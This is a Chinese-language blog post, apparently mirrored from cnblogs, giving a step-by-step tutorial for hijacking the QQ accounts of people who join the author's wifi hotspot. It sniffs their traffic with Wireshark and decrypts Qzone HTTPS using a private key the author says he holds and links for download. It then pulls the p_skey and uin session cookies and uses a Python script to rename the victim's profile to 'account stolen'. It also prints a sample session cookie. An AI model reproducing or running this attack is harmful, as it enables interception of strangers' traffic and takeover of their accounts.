zoukankan      html  css  js  c++  java
  • 盗取连接你wifi的人的qq

    #本文内容仅供个人娱乐学习

    思路:

    使用wireshark监听笔记本的wifi热点,拦截捕获连接你的wifi热点的人的手机qq网络数据包,从网络数据包中分析取出两个qq空间的两个coookie值,使用cookie值修改掉连接你的wifi的人的qq昵称,从而制造账号被盗的假象。

    实现:

    所需工具:wireshark数据包分析系统,能启用wifi热点的笔记本,一门可以输出http请求的编程语言。

    一、启用wifi热点

    二、确定wifi热点的接口名称

    三、打开wireshark监听这个网络接口

    四、用手机连接这个wifi热点,然后打开手机qq浏览一下动态(qq空间)

    五、解密wireshark捕获的数据包

    未解密的数据流:

    qq空间使用了https协议,wireshark无法自动解密https数据流,我们给wireshark提供一个qq空间的服务器证书私钥就可以解密qq空间的数据流了。

    这里我已经拿到了qq空间的私钥,qzone.key下载地址:https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ

    配置方法请见:http://www.cnblogs.com/aucy/p/9082429.html

    解密后的数据流:

    六、解密后在wireshark输入筛选规则“http.cookie”,找到“p_skey”与对应的“uin”这俩cookie值

    七、修改目标qq昵称

    数据包配置:

    url:https://mobile.qzone.qq.com/profile_mod

    cookie:p_uin=<uin值> p_skey=<p_skey值>

    data:format=json&nickname=<想要改的昵称>&birthyear=2018&birthmonth=1&birthday=1

    我这里使用python发送数据包:

    from urllib import request
    
    def HTTP_POST(url,data,headers):
        req=request.Request(url,bytes(data,"utf-8"),headers)
        res=request.urlopen(req)
        print(res.read())
    
    def ModNick(nick,cookies):
        url="https://mobile.qzone.qq.com/profile_mod"
        data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1"
        headers={
            "cookie":cookies
        }
        HTTP_POST(url,data,headers)
    
    if __name__ == '__main__':
        ModNick("账号已被盗","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")
  • 相关阅读:
    SEO高手和SEO屌丝的八个区
    【织梦免费模板】防火涂料网站模版
    利用火车头采集A67手机电影教程一
    SEO高级技巧
    .NET代码设计简单规范
    JAVA 和.NET在安全功能的比较
    poi实现excel数据的导入和导出
    eclipse复制bpmn文件到idea下乱码问题处理
    分账接收方与原请求方不一致,微信分账总结
    Java List<T> 去重
  • 原文地址:https://www.cnblogs.com/aucy/p/9092542.html
Copyright © 2011-2022 走看看